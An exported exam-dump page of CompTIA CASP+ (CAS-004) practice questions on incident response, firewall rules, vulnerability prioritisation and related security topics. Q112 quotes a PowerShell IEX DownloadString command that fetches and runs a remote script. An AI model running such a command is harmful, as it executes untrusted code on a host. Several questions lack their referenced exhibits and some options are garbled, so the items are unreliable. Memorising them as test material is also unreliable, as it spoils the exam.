This page was exported from Free Exams Dumps Materials [ http://exams.dumpsmaterials.com ] Export date:Sat Feb 22 18:25:04 2025 / +0000 GMT ___________________________________________________ Title: CAS-004 Actual Questions Answers PDF 100% Cover Real Exam Questions [Q93-Q115] --------------------------------------------------- CAS-004 Actual Questions Answers PDF 100% Cover Real Exam Questions CAS-004 Exam questions and answers CompTIA CASP+ Exam Certification Details: Sample QuestionsCompTIA CASP+ Sample QuestionsExam Price$466 (USD)Schedule ExamCompTIA MarketplacePearson VUEDuration165 minsBooks / TrainingCASP+ CAS-004Exam NameCompTIA Advanced Security Practitioner (CASP+)Number of Questions90   Q93. An analyst execute a vulnerability scan against an internet-facing DNS server and receives the following report:Which of the following tools should the analyst use FIRST to validate the most critical vulnerability?  Password cracker  Port scanner  Account enumerator  Exploitation framework Q94. While investigating a security event, an analyst finds evidence that a user opened an email attachment from an unknown source. Shortly after the user opened the attachment, a group of servers experienced a large amount of network and resource activity. Upon investigating the servers, the analyst discovers the servers were encrypted by ransomware that is demanding payment within 48 hours or all data will be destroyed. The company has no response plans for ransomware.Which of the following is the NEXT step the analyst should take after reporting the incident to the management team?  Pay the ransom within 48 hours.  Isolate the servers to prevent the spread.  Notify law enforcement.  Request that the affected servers be restored immediately. Q95. Immediately following the report of a potential breach, a security engineer creates a forensic image of the server in question as part of the organization incident response procedure. Which of the must occur to ensure the integrity of the image?  The image must be password protected against changes.  A hash value of the image must be computed.  The disk containing the image must be placed in a seated container.  A duplicate copy of the image must be maintained Q96. A security architect is reviewing the following proposed corporate firewall architecture and configuration:Both firewalls are stateful and provide Layer 7 filtering and routing. The company has the following requirements:Web servers must receive all updates via HTTP/S from the corporate network.Web servers should not initiate communication with the Internet.Web servers should only connect to preapproved corporate database servers.Employees’ computing devices should only connect to web services over ports 80 and 443.Which of the following should the architect recommend to ensure all requirements are met in the MOST secure manner? (Choose two.)  Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP 80,443  Add the following to Firewall_A: 15 PERMIT FROM 192.168.1.0/24 TO 0.0.0.0 TCP 80,443  Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP/UDP 0-65535  Add the following to Firewall_B: 15 PERMIT FROM 0.0.0.0/0 TO 10.0.0.0/16 TCP/UDP 0-65535  Add the following to Firewall_B: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0 TCP/UDP 0-65535  Add the following to Firewall_B: 15 PERMIT FROM 192.168.1.0/24 TO 10.0.2.10/32 TCP 80,443 Q97. The Chief information Officer (CIO) of a large bank, which uses multiple third-party organizations to deliver a service, is concerned about the handling and security of customer data by the parties. Which of the following should be implemented to BEST manage the risk?  Establish a review committee that assesses the importance of suppliers and ranks them according to contract renewals. At the time of contract renewal, incorporate designs and operational controls into the contracts and a right-to-audit clause. Regularly assess the supplier’s post-contract renewal with a dedicated risk management team.  Establish a team using members from first line risk, the business unit, and vendor management to assess only design security controls of all suppliers. Store findings from the reviews in a database for all other business units and risk teams to reference.  Establish an audit program that regularly reviews all suppliers regardless of the data they access, how they access the data, and the type of data, Review all design and operational controls based on best practice standard and report the finding back to upper management.  Establish a governance program that rates suppliers based on their access to data, the type of data, and how they access the data Assign key controls that are reviewed and managed based on the supplier’s rating. Report finding units that rely on the suppliers and the various risk teams. Q98. An organization is planning for disaster recovery and continuity of operations.INSTRUCTIONSReview the following scenarios and instructions. Match each relevant finding to the affected host.After associating scenario 3 with the appropriate host(s), click the host to select the appropriate corrective action for that finding.Each finding may be used more than once.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button. Q99. A security analyst is reviewing the following vulnerability assessment report:Which of the following should be patched FIRST to minimize attacks against Internet-facing hosts?  Server1  Server2  Server 3  Servers Q100. A company suspects a web server may have been infiltrated by a rival corporation. The security engineer reviews the web server logs and finds the following:The security engineer looks at the code with a developer, and they determine the log entry is created when the following line is run:Which of the following is an appropriate security control the company should implement?  Restrict directory permission to read-only access.  Use server-side processing to avoid XSS vulnerabilities in path input.  Separate the items in the system call to prevent command injection.  Parameterize a query in the path variable to prevent SQL injection. Q101. A company’s employees are not permitted to access company systems while traveling internationally. The company email system is configured to block logins based on geographic location, but some employees report their mobile phones continue to sync email traveling . Which of the following is the MOST likely ? (Select TWO.)  Outdated escalation attack  Privilege escalation attack  VPN on the mobile device  Unrestricted email administrator accounts  Chief use of UDP protocols  Disabled GPS on mobile devices Q102. A company is looking to fortify its cybersecurity defenses and is focusing on its network infrastructure. The solution cannot affect the availability of the company’s services to ensure false positives do not drop legitimate traffic.Which of the following would satisfy the requirement?  NIDS  NIPS  WAF  Reverse proxy Reference:https://owasp.org/www-community/controls/Intrusion_DetectionQ103. A security analyst is investigating a series of suspicious emails by employees to the security team. The email appear to come from a current business partner and do not contain images or URLs. No images or URLs were stripped from the message by the security tools the company uses instead, the emails only include the following in plain text.Which of the following should the security analyst perform?  Contact the security department at the business partner and alert them to the email event.  Block the IP address for the business partner at the perimeter firewall.  Pull the devices of the affected employees from the network in case they are infected with a zero-day virus.  Configure the email gateway to automatically quarantine all messages originating from the business partner. Q104. A high-severity vulnerability was found on a web application and introduced to the enterprise. The vulnerability could allow an unauthorized user to utilize an open-source library to view privileged user information. The enterprise is unwilling to accept the risk, but the developers cannot fix the issue right away.Which of the following should be implemented to reduce the risk to an acceptable level until the issue can be fixed?  Scan the code with a static code analyzer, change privileged user passwords, and provide security training.  Change privileged usernames, review the OS logs, and deploy hardware tokens.  Implement MFA, review the application logs, and deploy a WAF.  Deploy a VPN, configure an official open-source library repository, and perform a full application review for vulnerabilities. Q105. A company’s SOC has received threat intelligence about an active campaign utilizing a specific vulnerability.The company would like to determine whether it is vulnerable to this active campaign.Which of the following should the company use to make this determination?  Threat hunting  A system penetration test  Log analysis within the SIEM tool  The Cyber Kill Chain Q106. An auditor Is reviewing the logs from a web application to determine the source of an Incident. The web application architecture Includes an Internet-accessible application load balancer, a number of web servers In a private subnet, application servers, and one database server In a tiered configuration. The application load balancer cannot store the logs. The following are sample log snippets:Which of the following should the auditor recommend to ensure future incidents can be traced back to the sources?  Enable the x-Forwarded-For header al the load balancer.  Install a software-based HIDS on the application servers.  Install a certificate signed by a trusted CA.  Use stored procedures on the database server.  Store the value of the $_server ( ‘ REMOTE_ADDR ‘ ] received by the web servers. Q107. A developer is creating a new mobile application for a company. The application uses REST API and TLS 1.2 to communicate securely with the external back-end server. Due to this configuration, the company is concerned about HTTPS interception attacks.Which of the following would be the BEST solution against this type of attack?  Cookies  Wildcard certificates  HSTS  Certificate pinning Q108. A vulnerability analyst identified a zero-day vulnerability in a company’s internally developed software. Since the current vulnerability management system does not have any checks for this vulnerability, an engineer has been asked to create one.Which of the following would be BEST suited to meet these requirements?  ARF  ISACs  Node.js  OVAL Q109. Which of the following is the MOST important security objective when applying cryptography to control messages that tell an ICS how much electrical power to output?  Importing the availability of messages  Ensuring non-repudiation of messages  Enforcing protocol conformance for messages  Assuring the integrity of messages Q110. Device event logs sources from MDM software as follows:Which of the following security concerns and response actions would BEST address the risks posed by the device in the logs?  Malicious installation of an application; change the MDM configuration to remove application ID 1220.  Resource leak; recover the device for analysis and clean up the local storage.  Impossible travel; disable the device’s account and access while investigating.  Falsified status reporting; remotely wipe the device. Q111. A security analyst notices a number of SIEM events that show the following activity:Which of the following response actions should the analyst take FIRST?  Disable powershell.exe on all Microsoft Windows endpoints.  Restart Microsoft Windows Defender.  Configure the forward proxy to block 40.90.23.154.  Disable local administrator privileges on the endpoints. Q112. A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString (‘https://content.comptia.org/casp/whois.psl’);whoisWhich of the following security controls would have alerted and prevented the next phase of the attack?  Antivirus and UEBA  Reverse proxy and sandbox  EDR and application approved list  Forward proxy and MFA An EDR and whitelist should protect from this attack.Q113. A company is repeatedly being breached by hackers who valid credentials. The company’s Chief information Security Officer (CISO) has installed multiple controls for authenticating users, including biometric and token-based factors. Each successive control has increased overhead and complexity but has failed to stop further breaches. An external consultant is evaluating the process currently in place to support the authentication controls. Which of the following recommendation would MOST likely reduce the risk of unauthorized access?  Implement strict three-factor authentication.  Implement least privilege policies  Switch to one-time or all user authorizations.  Strengthen identify-proofing procedures Q114. A vulnerability assessment endpoint generated a report of the latest findings. A security analyst needs to review the report and create a priority list of items that must be addressed. Which of the following should the analyst use to create the list quickly?  Business impact rating  CVE dates  CVSS scores  OVAL Q115. A company wants to protect its intellectual property from theft. The company has already applied ACLs and DACs.Which of the following should the company use to prevent data theft?  Watermarking  DRM  NDA  Access logging  Loading … DumpsMaterials CAS-004 Exam Practice Test Questions: https://www.dumpsmaterials.com/CAS-004-real-torrent.html --------------------------------------------------- Images: https://exams.dumpsmaterials.com/wp-content/plugins/watu/loading.gif https://exams.dumpsmaterials.com/wp-content/plugins/watu/loading.gif --------------------------------------------------- --------------------------------------------------- Post date: 2023-02-13 09:33:17 Post date GMT: 2023-02-13 09:33:17 Post modified date: 2023-02-13 09:33:17 Post modified date GMT: 2023-02-13 09:33:17